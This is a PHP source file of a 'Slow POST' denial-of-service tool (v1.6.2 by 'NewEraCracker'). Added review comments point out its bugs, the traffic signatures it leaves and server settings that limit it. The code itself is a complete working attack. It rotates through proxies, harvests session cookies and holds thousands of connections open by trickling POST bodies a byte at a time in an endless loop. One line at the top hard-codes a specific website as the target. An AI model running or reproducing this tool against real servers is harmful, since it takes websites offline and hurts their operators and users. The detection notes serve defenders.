<?php
// Runtime setup: keep executing even if the invoking client goes away, and lift
// PHP's execution time limit so the script runs until it is killed.
ignore_user_abort(true);
set_time_limit(0);
// NOTE(review): this assignment overwrites the first command-line argument with a
// hard-coded URL. Because that URL passes NewEraUrl::isValid(), the interactive
// "Target url" and proxy prompts further down are never reached in this copy.
// For an incident responder the line is an artifact worth recording: this copy
// of the script was pre-configured for a single site.
$_SERVER['argv'][1] = 'http://aeestesl.com/index.php?option=com_content&view=article&id=144&Itemid=70';
//-------------------------
// CONFiG
//-------------------------
// Number of cookie strings NewEraCookies collects per round (one HTTP GET each).
$default_max_cookies = 100;
// Upper bound of the per-round connection loop in the main code.
$default_max_sockets = 9001;
// Passed as the third argument of stream_set_timeout(), which PHP interprets as
// microseconds, so the effective value is 500 microseconds despite the "msec" name.
$default_msec_timeout = 500;
// Delay handed to usleep() before each body fragment is written; 0 disables it.
$default_usleep_time = 0;
//-------------------------
// INiT
//-------------------------
// Define EXPLOIT_VERSION
if( !defined('EXPLOIT_VERSION') )
define( 'EXPLOIT_VERSION', 'v1.6.2' );
// Define STDIN
// Fallback for environments where the STDIN constant is not predefined.
if( !defined('STDIN') )
define( 'STDIN', fopen('php://stdin','r') );
// Check SAPI
// Refuses to run under anything but the command-line SAPI (loose != comparison on the SAPI name).
if(PHP_SAPI != 'cli')
{
echo 'This script is not meant to be ran via browser.';
exit(1);
}
// Globals - DO NOT EDIT
// Filled by proxyLoadFile() and read by proxyGetRandom(); stays null when no proxy list is used.
$global_proxy_array = null;
//-------------------------
// FUNCTiONS FOR THE LULZ
//-------------------------
/**
 * Reads one line from the STDIN stream.
 *
 * Returns the line with trailing whitespace removed, or false when the
 * STDIN handle itself is not usable.
 */
function readSTDIN()
{
    $stream = STDIN;
    if(!$stream)
    {
        return false;
    }
    // fgets() keeps the line terminator; rtrim() drops it together with any trailing blanks.
    return rtrim(fgets($stream));
}
/**
 * Reads a proxy-list file and fills $global_proxy_array with host/port pairs.
 *
 * Each usable line becomes array('host' => ..., 'port' => ...). Lines without a
 * ':' separator are removed with unset(), so the resulting array can have gaps
 * in its integer keys. The script terminates with exit(1) when the file cannot
 * be read or is empty.
 */
function proxyLoadFile($filename)
{
global $global_proxy_array;
// Load proxy list file
// Backslashes are normalised to forward slashes before the read.
$filename = str_replace('\\','/',$filename);
// Read errors are suppressed with @ and only detected through the falsy result below.
$global_proxy_array = @file_get_contents($filename);
if(!$filename || !$global_proxy_array)
{
echo $filename.' is not a valid proxy-list file!';
exit(1);
}
// Normalise CRLF / CR line endings to LF, then split into one entry per line.
$global_proxy_array = str_replace( array("\r\n","\r"), "\n", $global_proxy_array);
$global_proxy_array = explode("\n",$global_proxy_array);
// Grab the proxies
foreach($global_proxy_array as $key => $value)
{
$global_proxy_array[$key] = explode(':',$value);
if( isset($global_proxy_array[$key][0], $global_proxy_array[$key][1]) )
{
// This allows me to get proxies from lists like
// IP:PORT bla bla bla
// The port field is cut at the first space and then at the first tab.
$global_proxy_array[$key][1] = explode(' ',$global_proxy_array[$key][1]);
$global_proxy_array[$key][1] = explode("\t",$global_proxy_array[$key][1][0]);
$global_proxy_array[$key][1] = $global_proxy_array[$key][1][0];
// The proxy
// NOTE(review): neither host nor port is validated; both are kept as the raw strings from the file.
$global_proxy_array[$key] = array('host' => $global_proxy_array[$key][0], 'port' => $global_proxy_array[$key][1]);
}
else
{
// Line had no ':' -- drop it (this leaves a hole in the key sequence).
unset($global_proxy_array[$key]);
}
}
}
/**
 * Returns one randomly chosen entry of $global_proxy_array, or false when the
 * array is empty.
 *
 * The entry is the array('host' => ..., 'port' => ...) built by proxyLoadFile().
 */
function proxyGetRandom()
{
global $global_proxy_array;
// Give a random proxy
$proxy = null;
if( count($global_proxy_array) )
{
// The index is drawn from 0..count-1, but proxyLoadFile() removes invalid lines
// with unset(), so some indexes in that range may be missing (and surviving keys
// above count-1 are never drawn). The loop retries until it lands on an existing key.
while( !$proxy )
{
$rand = mt_rand(0,count($global_proxy_array)-1);
$proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null);
}
return $proxy;
}
return false;
}
/**
 * Returns a User-Agent string picked at random from a small fixed set.
 *
 * The set is: Windows NT 5.0 to 6.2 combined with either MSIE 7.0/8.0/9.0 or
 * Firefox 18.0/19.0/20.0. For log analysis this means every request built by
 * this script carries one of a few dozen dated, fixed-shape strings; on its own
 * that is only a weak signal, since such strings also occur in ordinary traffic.
 */
function randomUserAgent()
{
// Microsoft Windows versions
$os = array('5.0','5.1','5.2','6.0','6.1','6.2');
// Select a random windows
$os = $os [ mt_rand(0,count($os)-1) ];
// Select a random browser
if( mt_rand(0,1) )
{
// Internet Explorer versions
// Each pair is (Mozilla token version, MSIE version).
$ua[0] = array('4.0','7.0');
$ua[1] = array('4.0','8.0');
$ua[2] = array('5.0','9.0');
// Random IE
$ua = $ua [ mt_rand(0,count($ua)-1) ];
// The Trident token reuses the Mozilla version number ($ua[0]) rather than having its own value.
return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[0]})";
}
else
{
// Mozilla Firefox versions
$ua = array('18.0','19.0','20.0');
// Random FF
$ua = $ua [ mt_rand(0,count($ua)-1) ];
return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}) Gecko/20100101 Firefox/{$ua}";
}
}
/**
 * Opens a TCP (or TLS) stream to the proxy when one is given, otherwise to the
 * URL's own host, and returns the stream or false when the connect fails.
 *
 * Both arguments are objects exposing ->ssl, ->name and ->port (NewEraUrl /
 * NewEraProxy in this file).
 */
function openCustomSocket($newEraUrl, $newEraProxy=null)
{
global $default_msec_timeout;
// Loose == comparison: a null proxy selects the direct connection.
$newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy);
$host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name;
// Connect timeout is fixed at 1 second; warnings are suppressed with @.
$fp = @fsockopen($host, $newEraConnection->port, $errno, $errstr, 1);
if (!$fp)
return false;
// The stream is switched to non-blocking mode, so later writes return immediately.
stream_set_blocking($fp,0);
// Third argument of stream_set_timeout() is microseconds.
stream_set_timeout($fp,0,$default_msec_timeout);
return $fp;
}
/**
 * Receives a socket and performs the start of a slowPosting
 * Returns Content-Length on success and false on failure
 *
 * Only the request line and headers are written here; no body bytes follow, so
 * the server is left waiting for the announced number of body bytes.
 *
 * Traffic characteristics visible in this function (useful for detection):
 *  - POST with a Content-Length drawn from 1337..31337 and a form-urlencoded Content-Type;
 *  - an Accept header whose value literally starts with "Accept: " (duplicated token);
 *  - a Keep-Alive header holding a bare number between 60 and 120;
 *  - a Referer pointing at the site root on roughly half of the requests.
 * Servers bound this pattern with request-body read timeouts / minimum data
 * rates (for example Apache mod_reqtimeout's RequestReadTimeout or nginx
 * client_body_timeout) and per-client connection limits.
 */
function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie)
{
// Check the socket
if($sock)
{
// Generate a random Content-Length
$length = mt_rand(1337,31337);
// Init
// Direct connection: origin-form request target. Through a proxy: absolute URL.
if($newEraProxy == null)
$out = 'POST /'.$newEraUrl->path.' HTTP/1.1'."\r\n";
else
$out = 'POST '.$newEraUrl->full_url.' HTTP/1.1'."\r\n";
// Build
$out .= 'Host: '.$newEraUrl->name."\r\n";
$out .= 'Connection: Keep-Alive'."\r\n";
$out .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$out .= 'User-Agent: '.randomUserAgent()."\r\n";
$out .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$out .= 'Accept-Encoding: gzip,deflate'."\r\n";
$out .= 'Keep-Alive: '.mt_rand(60,120)."\r\n";
$out .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
$out .= mt_rand(0,1) ? 'Referer: '.($newEraUrl->ssl?'https://':'http://').$newEraUrl->name.'/'."\r\n" : '';
// A falsy $cookie (empty string or false) simply omits the Cookie header.
$out .= ($cookie ? "Cookie: {$cookie}\r\n" : '' );
$out .= 'Content-Length: '.$length."\r\n";
$out .= "\r\n";
// Do it
// The write result is not checked; the length is returned even if nothing was sent.
@fwrite($sock, $out);
return $length;
}
return false;
}
/**
 * Receives a socket and continues the slowPosting
 *
 * Writes a small urlencoded fragment of random printable characters to $sock.
 * Returns true when a socket was given (the write result itself is not
 * checked) and false otherwise.
 */
function slowPostContinue($sock,$bytes=5)
{
global $default_usleep_time;
// Throttle execution speed slightly
if( $default_usleep_time > 0 )
@usleep($default_usleep_time);
// Check the $bytes
// Non-integer values fall back to 5 (loose comparison against intval()).
if( intval($bytes) != $bytes ) $bytes=5;
// Check the socket
if($sock)
{
// Do it :D
$out = '';
// NOTE(review): the for statement below ends with ';', so it is an empty loop and
// the brace block after it executes exactly once. As written, each call emits a
// single random character (1 byte, or 3 bytes when urlencode() escapes it),
// independent of $bytes. When analysing captures, expect fragments of that size.
for($j=0;$j<$bytes;$j++);
{
$out .= chr(mt_rand(33,126));
}
$out = urlencode($out);
@fwrite($sock, $out);
return true;
}
else
return false;
}
//-------------------------
// CLASSES FOR THE LULZ
//-------------------------
/**
 * Collects cookie strings from the target by issuing plain GET requests and
 * hands them out again for use in later requests.
 *
 * Every stored entry is a ready-made Cookie header value ("k=v; k2=v2"),
 * an empty string when the fetch failed, or false when the response set no
 * cookies. From the server's side each entry corresponds to one GET that
 * created a new session, so a burst of session-creating GETs without follow-up
 * page loads precedes the POST traffic.
 */
class NewEraCookies
{
// Number of fetches per round and upper bound for the random index.
private $max_cookies;
// Collected Cookie header values, indexed 0..max_cookies-1.
private $cookies = array();
/** Constructor */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile=null, $output=false)
{
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/**
 * Object updater
 *
 * Discards the stored cookies and fetches $max_cookies new ones. When
 * $proxyFile is truthy a random proxy is selected before every fetch;
 * $output enables a progress indicator on stdout.
 */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile=null, $output=false)
{
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i=0; $i<$this->max_cookies; $i++)
{
// Using Proxy file?
if( $proxyFile )
{
$newproxy = proxyGetRandom();
// NOTE(review): the caller in this file passes a boolean flag as $proxyFile,
// so this message would print the flag rather than a file name.
if(!$newproxy)
exit($proxyFile.' is not a valid proxy-list file!');
// Mutates the proxy object shared with the caller.
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
if($output)
echo '.';
}
}
/**
 * Returns a cookie by its index
 *
 * Passing 'random' selects a random index. Unknown indexes yield ''.
 */
public function returnCookieByIndex($idx)
{
// Loose comparison; the only caller in this file passes the string 'random'.
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies-1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/**
 * Function to parse set-cookie from header fields
 *
 * $header is a list of raw response header lines. Returns one array per
 * Set-Cookie line: ['value' => ['key' => ..., 'value' => ...]] plus any of
 * domain / expires / path / secure / comment that were present.
 */
public static function cookieParse($header)
{
$cookies = array();
foreach($header as $line)
{
if(preg_match('/^Set-Cookie: /i', $line))
{
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
$has_grabbed_cookie_data = false;
foreach($csplit as $data)
{
// NOTE(review): splitting on every '=' means only the text up to the second '='
// is kept as the value, and a segment without '=' leaves $cinfo[1] undefined.
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
// The first segment of the line is the cookie's name=value pair.
if(!$has_grabbed_cookie_data)
{
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$has_grabbed_cookie_data = true;
continue;
}
// Remaining segments are attributes; names are compared case-insensitively.
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires','path','secure','comment')))
{
$cdata[trim($cinfo[0])] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/**
 * Function to build the request cookie header from parsed set-cookie data
 *
 * Returns "k=v; k2=v2" for the parsed cookies, or false when $data is not an
 * array or contains no cookies. Attributes such as path or expires are ignored.
 */
public static function cookieBuild($data)
{
if(is_array($data))
{
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/**
 * Function to grab cookies from an url using PHP's fopen
 *
 * Issues one GET for $newEraUrl->full_url (optionally through the proxy) and
 * returns the cookies set by the response as a Cookie header value. Returns ''
 * when the request could not be opened and false when no cookie was set.
 */
public static function cookieGrab($newEraUrl, $newEraProxy=null)
{
// Build connection headers
// Same header set as the POST builder, including the duplicated "Accept: " token.
$headers = 'Connection: Keep-Alive'."\r\n";
$headers .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$headers .= 'User-Agent: '.randomUserAgent()."\r\n";
$headers .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$headers .= 'Accept-Encoding: gzip,deflate'."\r\n";
$headers .= 'Keep-Alive: '.mt_rand(60,120)."\r\n";
// Check proxy url
if($newEraProxy == null)
{
// Disable proxy
$proxy_url = '';
$request_fulluri = false;
}
else
{
// Enable proxy
$proxy_url = $newEraProxy->full_url;
$request_fulluri = true;
}
// Build stream context
// 3 second timeout, redirects not followed, error responses still readable.
$context = stream_context_create(array(
'http' => array(
'method' => 'GET',
'timeout' => (3),
'header' => $headers,
'proxy' => $proxy_url,
'request_fulluri' => $request_fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
// TLS certificate verification is switched off for this fetch.
'ssl' => array(
'verify_peer' => false
)
));
// Let the fun begin
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, $context);
// I hope this does work
if($handle)
{
// If it worked, we grab the cookies
// For the http wrapper, wrapper_data holds the response header lines.
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
// Fun is only at a small distance
// The response body is never read; only the headers are used.
@fclose($handle);
}
return $cookie;
}
}
/**
 * Minimal URL holder: splits "scheme://host[:port]/path" into its parts and
 * exposes them read-only through __get as full_url, protocol, ssl, name, port
 * and path. No validation beyond the prefix checks below is performed.
 */
class NewEraUrl
{
    private $host_full_url;
    private $host_protocol;
    private $host_ssl;
    private $host_name;
    private $host_port;
    private $host_path;

    /** Builds the object by delegating to update_object(). */
    public function __construct($host_full_url)
    {
        $this->update_object($host_full_url);
    }

    /**
     * Re-parses the given URL string and overwrites every stored part.
     *
     * The port stays a string when it was written in the URL and is the
     * integer 443 or 80 when it had to be defaulted.
     */
    public function update_object($host_full_url)
    {
        $this->host_full_url = $host_full_url;

        // Prefix test only: anything starting with "https" counts as TLS.
        $this->host_ssl = (strpos($host_full_url, 'https') === 0);
        if($this->host_ssl)
            $this->host_protocol = 'https';
        else
            $this->host_protocol = 'http';

        // Pieces are "scheme:", "", "host[:port]" and the rest of the URL.
        $segments = explode('/', $host_full_url, 4);
        $authority = explode(':', $segments[2], 2);

        $this->host_name = $authority[0];
        if(isset($authority[1]))
            $this->host_port = $authority[1];
        else
            $this->host_port = ($this->host_ssl ? 443 : 80);

        // Path is stored without its leading slash; empty when the URL has none.
        if(isset($segments[3]))
            $this->host_path = $segments[3];
        else
            $this->host_path = '';
    }

    /** Read access to the private host_* fields; unknown names give null. */
    public function __get($var)
    {
        $property = 'host_'.$var;
        if(!property_exists($this, $property))
            return null;
        return $this->{$property};
    }

    /**
     * Accepts strings that begin with "https://" or "http://".
     * Returns true for those and null (not false) for everything else.
     */
    public static function isValid($host_full_url)
    {
        foreach(array('https://', 'http://') as $scheme)
        {
            if(strpos($host_full_url, $scheme) === 0)
                return true;
        }
    }
}
/**
 * Minimal proxy endpoint holder: parses "[scheme://]host[:port]" and exposes
 * the parts read-only through __get as full_url, protocol, ssl, name and port.
 */
class NewEraProxy
{
    private $proxy_full_url;
    private $proxy_protocol;
    private $proxy_ssl;
    private $proxy_name;
    private $proxy_port;

    /** Builds the object by delegating to update_object(). */
    public function __construct($proxy_full_url)
    {
        $this->update_object($proxy_full_url);
    }

    /**
     * Re-parses the given endpoint string and overwrites every stored part.
     * The port is always stored as an integer (443 or 80 when not given).
     */
    public function update_object($proxy_full_url)
    {
        $this->proxy_full_url = $proxy_full_url;

        // Prefix test only: anything starting with "ssl" counts as TLS.
        $this->proxy_ssl = (strpos($proxy_full_url, 'ssl') === 0);
        if($this->proxy_ssl)
            $this->proxy_protocol = 'ssl';
        else
            $this->proxy_protocol = 'tcp';

        // Drop an optional "scheme://" prefix before splitting host and port.
        $remainder = $proxy_full_url;
        $schemeEnd = strpos($proxy_full_url, '://');
        if($schemeEnd !== false)
            $remainder = substr($proxy_full_url, $schemeEnd+3);
        $pieces = explode(':', $remainder);

        $this->proxy_name = $pieces[0];
        if(isset($pieces[1]))
            $portText = $pieces[1];
        else
            $portText = ($this->proxy_ssl ? '443' : '80');
        $this->proxy_port = (int)$portText;
    }

    /** Read access to the private proxy_* fields; unknown names give null. */
    public function __get($var)
    {
        $property = 'proxy_'.$var;
        if(!property_exists($this, $property))
            return null;
        return $this->{$property};
    }
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
// Start-up banner and version line printed to stdout. The banner text and the
// "<version> by <handle>" line are fixed strings, so they can serve as content
// signatures when searching hosts or paste archives for copies of this script.
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Fetch the URL to attack
// argv[1] is accepted only when it starts with http:// or https://.
// In this copy argv[1] is assigned a fixed URL at the top of the file, so this
// branch is always taken.
$url = null;
if( isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]) )
$url = $_SERVER['argv'][1];
// Fetch proxy to use
// argv[2] may be either "host:port" or the path of a readable proxy-list file.
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if( !empty($url) && isset($_SERVER['argv'][2]) )
{
// NOTE(review): this assignment replaces the whole $proxy array, including the
// 'file' => false default set above. If argv[2] is neither host:port nor a
// readable file, $proxy['file'] is left undefined for the code further down.
if( $proxy = explode(':',$_SERVER['argv'][2]) )
{
if( isset($proxy[0], $proxy[1]) )
{
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = $proxy[1];
unset($proxy[0], $proxy[1]);
}
}
if( !( isset($proxy['host']) && isset($proxy['port']) ) && is_readable($_SERVER['argv'][2]) )
{
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Ask for proxy
// Interactive prompts run only when no valid URL came from argv.
if( empty($url) && ( empty($proxy['host']) || empty($proxy['port']) ) && !$proxy['file'] )
{
$proxy['use'] = null;
while( !$proxy['use'] )
{
echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: ';
$proxy['use'] = readSTDIN();
// Only the first letter of the answer is examined (y / n / f, case-insensitive).
if( strpos(strtolower($proxy['use']),'y') === 0 )
{
echo PHP_EOL.'Proxy IP: ';
$proxy['host'] = readSTDIN();
echo PHP_EOL.'Proxy Port: ';
$proxy['port'] = readSTDIN();
}
elseif( strpos(strtolower($proxy['use']),'n') === 0 )
{
break;
}
elseif( strpos(strtolower($proxy['use']),'f') === 0 )
{
echo PHP_EOL.'Proxy file: ';
$proxy['filename'] = readSTDIN();
if( is_readable($proxy['filename']) )
{
$proxy['file'] = true;
}
else
{
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$proxy['use'] = null;
}
}
else
{
$proxy['use'] = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
}
}
unset($proxy['use']);
}
// Ask for target URL
while( !$url )
{
echo PHP_EOL.'Target url: ';
$url = readSTDIN();
if( NewEraUrl::isValid($url) ) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy suport
// Three outcomes: no proxy ($newEraProxy stays null), a random entry from the
// proxy-list file, or the single host:port given by the operator.
if( empty($proxy['host']) || empty($proxy['port']) )
{
$newEraProxy = null;
if( !empty($proxy['file']) )
{
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
}
else
{
$newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']);
}
// Init the others
// Socket default timeout is lowered to 1 second for every stream opened afterwards.
@ini_set('default_socket_timeout',1);
$newEraUrl = new NewEraUrl($url);
// Constructing the cookie collection immediately performs $default_max_cookies GET requests.
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $default_max_cookies, $proxy['file'], true);
// Do it
// Endless outer loop; one pass is a "round". Within a round the script attempts
// up to $default_max_sockets connections and, after every attempt, writes one
// small body fragment on each connection that is still open. The resulting
// server-side picture is many concurrent POSTs whose bodies arrive a few bytes
// at a time. Without a proxy list they all originate from one address, which is
// what per-client connection limits and request-body read timeouts
// (e.g. Apache RequestReadTimeout, nginx client_body_timeout) are meant to bound.
while(true)
{
// Per-round table: index => array('sock' => stream, 'length' => remaining byte counter).
$fp = array();
// Start
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
for($i=0;$i<$default_max_sockets;$i++)
{
// Using Proxy file?
if( $proxy['file'] )
{
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket (only try to open SSL sockets if not using proxies)
if( $fp[$i]['sock'] = openCustomSocket($newEraUrl, $newEraProxy) )
{
// Progress bar?
echo '+';
// Start a new slowPost
// Headers are sent with a randomly chosen cookie from the collected set.
if( $_length = slowPostStart($fp[$i]['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random') ) )
{
// Find the lenght
// Remember the announced Content-Length as this connection's countdown.
if( !isset($fp[$i]['length']) )
{
$fp[$i]['length'] = $_length;
}
}
else
{
// Epic fail?
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
}
else
{
// Epic fail?
// Connect failed: 'sock' is false here, the suppressed fclose() is a no-op cleanup.
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
// Check the current sockets
foreach($fp as $_k => $_v)
{
if($fp[$_k]['length'] > 0)
{
// Contine old slowPosts
// The countdown drops by the requested chunk size (at most 5) per pass; it is
// not tied to the number of bytes slowPostContinue() actually wrote.
$_length = ($fp[$_k]['length'] < 5) ? $fp[$_k]['length'] : 5;
slowPostContinue($fp[$_k]['sock'],$_length);
$fp[$_k]['length'] = $fp[$_k]['length']-$_length;
}
else
{
// Close completed slowPosts
// Closed on the script's own countdown; the server's response is never read.
@fclose($fp[$_k]['sock']);
unset($fp[$_k]);
}
}
unset($_k,$_v);
}
// Restart
// End of round: drop every remaining connection and fetch a fresh cookie set.
foreach($fp as $_k => $_v)
{
@fclose($fp[$_k]['sock']);
}
$newEraCookies->update_object($newEraUrl, $newEraProxy, $default_max_cookies, $proxy['file'], true);
}
?>